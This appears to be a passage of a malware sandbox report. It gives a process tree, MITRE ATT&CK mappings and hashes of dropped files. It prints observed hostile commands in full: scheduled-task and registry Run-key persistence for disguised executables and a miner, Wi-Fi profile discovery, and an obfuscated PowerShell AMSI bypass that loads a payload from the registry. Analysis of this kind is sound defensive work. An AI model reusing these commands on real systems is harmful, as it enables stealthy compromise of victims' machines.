  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:7352
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:8436
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:7588
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  PID:7500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 228 -p 3044 -ip 3044
1⤵
PID:2852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2752 -ip 2752
1⤵
PID:4128

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 232 -p 2824 -ip 2824
1⤵
PID:3620

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6048

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
PID:3228

C:\Users\Admin\Desktop\Files\Ammyy.exe
"C:\Users\Admin\Desktop\Files\Ammyy.exe" -service -lunch
1⤵
PID:5260
- C:\Users\Admin\Desktop\Files\Ammyy.exe
  "C:\Users\Admin\Desktop\Files\Ammyy.exe"
  2⤵
  PID:3272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3396 -ip 3396
1⤵
PID:888

C:\ProgramData\shwoid\qwmm.exe
"C:\ProgramData\shwoid\qwmm.exe"
1⤵
PID:6896

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
- Network Service Discovery
PID:7584

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:8296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
PID:9072

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
PID:7464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 7868 -ip 7868
1⤵
PID:5896

C:\Users\Admin\AppData\Local\Temp\requirements.exe
"C:\Users\Admin\AppData\Local\Temp\requirements.exe"
1⤵
PID:6776

C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
1⤵
PID:6852

C:\ProgramData\retxek\pkhffdl.exe
"C:\ProgramData\retxek\pkhffdl.exe"
1⤵
PID:8300

C:\Users\Admin\AppData\Roaming\service.exe
"C:\Users\Admin\AppData\Roaming\service.exe"
1⤵
PID:6772
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C schtasks /create /tn WinApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
  2⤵
  PID:1552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 6120 -ip 6120
1⤵
PID:9984

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f8 0x2c8
1⤵
PID:8572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 248 -p 9500 -ip 9500
1⤵
PID:7556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 9308 -ip 9308
1⤵
PID:8904

C:\Users\Admin\AppData\Local\Temp\requirements.exe
"C:\Users\Admin\AppData\Local\Temp\requirements.exe"
1⤵
PID:5536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 244 -p 8384 -ip 8384
1⤵
PID:4648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5764 -ip 5764
1⤵
PID:5500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 7272 -ip 7272
1⤵
PID:8328

C:\Users\Admin\AppData\Local\Temp\ixwj.exe
"C:\Users\Admin\AppData\Local\Temp\ixwj.exe"
1⤵
PID:5288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 9308 -ip 9308
1⤵
PID:3108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\brokercrtCommon\jcaZMtW2rbiW2e1QeNNetVWZXeHgUKTOIYd2mPwtWiVT.bat" "
1⤵
PID:8212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ffb7c3446f8,0x7ffb7c344708,0x7ffb7c344718
1⤵
PID:2496

C:\Users\Admin\AppData\Local\Temp\256929186.exe
C:\Users\Admin\AppData\Local\Temp\256929186.exe
1⤵
PID:1288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 9308 -ip 9308
1⤵
PID:5328

C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
1⤵
PID:4384

C:\Users\Admin\AppData\Local\Temp\2707921219.exe
C:\Users\Admin\AppData\Local\Temp\2707921219.exe
1⤵
PID:4912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,3679800391020753661,710285794874000615,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
1⤵
PID:8144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 252 -p 9308 -ip 9308
1⤵
PID:8584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;
1⤵
PID:1480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 248 -p 10644 -ip 10644
1⤵
PID:10764

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XbzHSJOZ8d.bat"
1⤵
PID:11180
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:4916
- C:\Windows\system32\w32tm.exe
  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
  2⤵
  PID:11296
- C:\Program Files (x86)\Windows Photo Viewer\CompatTelRunner.exe
  "C:\Program Files (x86)\Windows Photo Viewer\CompatTelRunner.exe"
  2⤵
  PID:12028

C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
1⤵
PID:10384

C:\Users\Admin\AppData\Local\Temp\69344962.exe
C:\Users\Admin\AppData\Local\Temp\69344962.exe
1⤵
PID:9076

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
1⤵
PID:7840

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,3679800391020753661,710285794874000615,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2444 /prefetch:2
1⤵
PID:10732

C:\Users\Admin\AppData\Local\Temp\tftp.exe
"C:\Users\Admin\AppData\Local\Temp\tftp.exe"
1⤵
PID:2960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 8684 -ip 8684
1⤵
PID:4384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 8876 -ip 8876
1⤵
PID:1676

C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
1⤵
PID:4384
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
  2⤵
  PID:6736
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im tftp.exe
    3⤵
    - Kills process with taskkill
    PID:8336
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
  2⤵
  PID:5040
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
  2⤵
  PID:4392

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
1⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:7160
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:5704
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:404
- C:\Windows\system32\findstr.exe
  findstr /R /C:"[ ]:[ ]"
  2⤵
  PID:1092

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
1⤵
PID:11488
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:10712
- C:\Windows\system32\netsh.exe
  netsh wlan show networks mode=bssid
  2⤵
  PID:11168
- C:\Windows\system32\findstr.exe
  findstr "SSID BSSID Signal"
  2⤵
  PID:7012

C:\Users\Admin\AppData\Local\Temp\requirements.exe
"C:\Users\Admin\AppData\Local\Temp\requirements.exe"
1⤵
PID:11584

C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
1⤵
PID:11720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 8976 -ip 8976
1⤵
PID:6300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 6488 -ip 6488
1⤵
PID:1176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 9308 -ip 9308
1⤵
PID:11792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 10356 -ip 10356
1⤵
PID:12008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10356 -s 856
1⤵
- Program crash
PID:9988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 172 -ip 172
1⤵
PID:11448

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:1292

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
1⤵
PID:7784

C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
1⤵
PID:6996

C:\Users\Admin\AppData\Local\Temp\requirements.exe
"C:\Users\Admin\AppData\Local\Temp\requirements.exe"
1⤵
PID:11796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 10268 -ip 10268
1⤵
PID:9668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 9308 -ip 9308
1⤵
PID:5620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 9308 -ip 9308
1⤵
PID:11656

C:\Users\Admin\AppData\Roaming\Apaches hotbed.exe
"C:\Users\Admin\AppData\Roaming\Apaches hotbed.exe"
1⤵
PID:8004

C:\Users\Admin\AppData\Local\Temp\requirements.exe
"C:\Users\Admin\AppData\Local\Temp\requirements.exe"
1⤵
PID:11316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:BpcCdBZPTTrQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DpzprQcRfDBMtL,[Parameter(Position=1)][Type]$EIaiVoAljC)$yZZvWhMqzJm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+'c'+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+'e'+[Char](84)+'y'+[Char](112)+'e','C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](80)+''+'u'+''+[Char](98)+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+'l'+'e'+[Char](100)+',A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+'las'+[Char](115)+''+','+''+[Char](65)+''+[Char](117)+''+'t'+''+'o'+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yZZvWhMqzJm.DefineConstructor('R'+[Char](84)+'S'+[Char](112)+'e'+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$DpzprQcRfDBMtL).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+',Man'+'a'+'g'+[Char](101)+''+'d'+'');$yZZvWhMqzJm.DefineMethod('In'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+'b'+[Char](108)+''+'i'+''+'c'+','+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+'ByS'+[Char](105)+'g'+','+''+'N'+''+[Char](101)+'w'+'S'+''+'l'+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$EIaiVoAljC,$DpzprQcRfDBMtL).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+'ged');Write-Output $yZZvWhMqzJm.CreateType();}$OyPucEtQjzbdo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+''+[Char](101)+'m'+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+'r'+''+'o'+'s'+'o'+'f'+[Char](116)+''+[Char](46)+''+[Char](87)+'in3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+'e'+''+'N'+''+[Char](97)+'t'+[Char](105)+'v'+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+''+'s'+'');$PoeroWvTuUhIpC=$OyPucEtQjzbdo.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+'d'+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$iPSyacUlrbFzsKWUfTG=BpcCdBZPTTrQ @([String])([IntPtr]);$ISRmnSvWIRvCsraWaLqRrH=BpcCdBZPTTrQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZvBbHxeVAJG=$OyPucEtQjzbdo.GetMethod(''+[Char](71)+'et'+[Char](77)+'od'+'u'+''+[Char](108)+''+[Char](101)+''+'H'+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+'l3'+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$FarvRvvcuABUkU=$PoeroWvTuUhIpC.Invoke($Null,@([Object]$ZvBbHxeVAJG,[Object](''+[Char](76)+''+'o'+''+'a'+'d'+[Char](76)+''+[Char](105)+'b'+'r'+''+[Char](97)+'r'+'y'+'A')));$givNnSwqjReIdvVgK=$PoeroWvTuUhIpC.Invoke($Null,@([Object]$ZvBbHxeVAJG,[Object]('Vi'+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$RtCMCtB=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FarvRvvcuABUkU,$iPSyacUlrbFzsKWUfTG).Invoke(''+'a'+''+[Char](109)+'s'+'i'+'.'+[Char](100)+''+[Char](108)+'l');$TBgRALnUMJRnNrofB=$PoeroWvTuUhIpC.Invoke($Null,@([Object]$RtCMCtB,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+'r')));$ingXlcWQcr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($givNnSwqjReIdvVgK,$ISRmnSvWIRvCsraWaLqRrH).Invoke($TBgRALnUMJRnNrofB,[uint32]8,4,[ref]$ingXlcWQcr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TBgRALnUMJRnNrofB,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($givNnSwqjReIdvVgK,$ISRmnSvWIRvCsraWaLqRrH).Invoke($TBgRALnUMJRnNrofB,[uint32]8,0x20,[ref]$ingXlcWQcr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+'l'+[Char](101)+''+'r'+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
1⤵
- Command and Scripting Interpreter: PowerShell
PID:4612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Synaptics\Synaptics.exe

Filesize
753KB

MD5
075045f176129f6b11d627db7c7a3c76

SHA1
d815d313d2882041b8adb063eda6a8bd62149443

SHA256
86586abd265e12fc63222aff947d6acb4f3d28b148f9c5abc5d548d74795f9c8

SHA512
86e9aff5e3cde31a9a553108f833003a9d905c1a1c1db72dca80cf0816ddabe63d18b8d7a616717c2f01f10148bc06915af0b9c4222305d5681d29d3b9d9198b

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0AD02051761D498A6A68A35351C6C04

Filesize
5B

MD5
5bfa51f3a417b98e7443eca90fc94703

SHA1
8c015d80b8a23f780bdd215dc842b0f5551f63bd

SHA256
bebe2853a3485d1c2e5c5be4249183e0ddaff9f87de71652371700a89d937128

SHA512
4cd03686254bb28754cbaa635ae1264723e2be80ce1dd0f78d1ab7aee72232f5b285f79e488e9c5c49ff343015bd07bb8433d6cee08ae3cea8c317303e3ac399

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0AD02051761D498A6A68A35351C6C04

Filesize
406B

MD5
04270dd26f8884ddda6431bd921ae2c1

SHA1
a037e2fdadd54b32f554e875fd955dfcc2f9d4e2

SHA256
4306517fc4fec005df288c96e4756b5884d3c3d900c67d17a5ff8fd0cb206cad

SHA512
2ef73efd4bc4c2e61e8e36b20f69911f26ada1cf936240df7bc88115f2f960c26b7eef547392dbadd15546b3ffa90700a8d7e6fd3ea569eaa3c78a333ba815cd

Download Submit
C:\Users\Admin\AppData\Local\GreenTech Dynamics\EcoCraft.scr

Filesize
872KB

MD5
18ce19b57f43ce0a5af149c96aecc685

SHA1
1bd5ca29fc35fc8ac346f23b155337c5b28bbc36

SHA256
d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd

SHA512
a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\2101413903.exe.log

Filesize
425B

MD5
822f6384df6d1671168631e912dd7a4c

SHA1
972aacac112d14ea63c9d33b57ecd402e67a5f19

SHA256
5f50faf2e5bbac2ce5423530952c977e965d60dfb6920a5cce5a707bac630bc4

SHA512
3c03b3c90b551c7febce56406b48e5e4022e7128bfd3a283ec0e3dd952575649af3428b514fb8a312358eb643d3a4f3f4f747a16c29b8863f5367fffe11a9fbf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b5fffb9ed7c2c7454da60348607ac641

SHA1
8d1e01517d1f0532f0871025a38d78f4520b8ebc

SHA256
c8dddfb100f2783ecbb92cec7f878b30d6015c2844296142e710fb9e10cc7c73

SHA512
9182a7b31363398393df0e9db6c9e16a14209630cb256e16ccbe41a908b80aa362fc1a736bdfa94d3b74c3db636dc51b717fc31d33a9fa26c3889dec6c0076a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
247B

MD5
94bd83393ee4e3c749f28c3414160cbc

SHA1
68effb04ecc392f2ae4ad7bdc1e99b9116da474c

SHA256
e1dbf44fca250f32925910fcd7f59276e46d0d916eff30fdf9f85ef91bcd3d4b

SHA512
203109a405cd685a195e6cdae5d0a624abcd6c6a9333b88f312e50f96bafa03057366bd78bf62df8784ec97f14677d56f8b78b472000044618a784bcf7af3e8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe66529b.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
